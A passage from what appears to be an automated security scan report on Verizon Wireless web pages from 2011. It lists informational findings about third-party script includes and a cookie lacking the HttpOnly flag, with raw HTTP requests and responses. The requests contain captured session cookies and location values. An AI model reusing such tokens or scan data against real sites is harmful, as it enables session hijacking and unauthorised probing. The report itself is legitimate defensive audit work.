   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...
</noscript>
   

       <script src="http://cache.vzw.com/scripts/homepage/vzwCarousel.js" type="text/javascript"></script>
...[SNIP]...

4.4. http://www.verizonwireless.com/b2c/shoppingAssistant  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=1&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204729|session#1310993870949-319721#1310996989|check#true#1310995189; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:43:41 GMT
Pragma: no-cache
Content-Length: 7992
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
   <title>Shopping Cart</title>
   

                   
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://cache.vzw.com/dwr/util.js'></script>
<script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js"></script>
...[SNIP]...

4.5. http://www.verizonwireless.com/b2c/store/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635 HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?&item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312203471|check#true#1310993931|session#1310993870949-319721#1310995731; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:01:21 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 61973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-u
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>


       <script type="text/javascript" src="http://cache.vzw.com/dwr/dwrUtil.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/dwr/util.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>


<script type='text/javascript' src='http://cache.vzw.com/dwr/interface/Timer.js'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...
</iframe>
<script type="text/javascript" src="https://stags.bluekai.com/js/bk-static-secure.js"></script>
...[SNIP]...

4.6. http://www.verizonwireless.com/b2c/store/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/store/controller?&item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635 HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1311781870|check#true#1310572330|session#1310572240370-41417#1310574130; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310569615.1; __utmz=96859928.1310569615.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 12:57:50 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 20770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                                       <html xmlns="http://www.w3.org/
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="https://scache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="https://scache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

4.7. http://www.verizonwireless.com/b2c/store/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/store/controller?item=phoneFirst&action=viewShopIndex HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204578|session#1310993870949-319721#1310996838|check#true#1310995038; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:17:47 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 26926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xm
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/s11.css" />
   <script type="text/javascript" src="http://cache.vzw.com/scripts/s11.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>


<script type='text/javascript' src='http://cache.vzw.com/dwr/interface/Timer.js'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

4.8. http://www.verizonwireless.com/b2c/store/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=12&lid=//global//shop//phones+and+devices//tablets HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/explore/
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204559|session#1310993870949-319721#1310996819|check#true#1310995019; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:16:08 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 79525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                <html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>

   <script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
</script>
   <script type='text/javascript' src='http://cache.vzw.com/dwr/util.js'></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/store/phones_devices.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>


<script type='text/javascript' src='http://cache.vzw.com/dwr/interface/Timer.js'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

4.9. http://www.verizonwireless.com/b2c/storelocator/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/storelocator/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/storelocator/index.jsp HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html?tab=myaccount
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204290|session#1310993870949-319721#1310996550|check#true#1310994750; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:11:56 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 16082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xm
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/vzwfly

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

POST /b2c/vzwfly HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?&item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
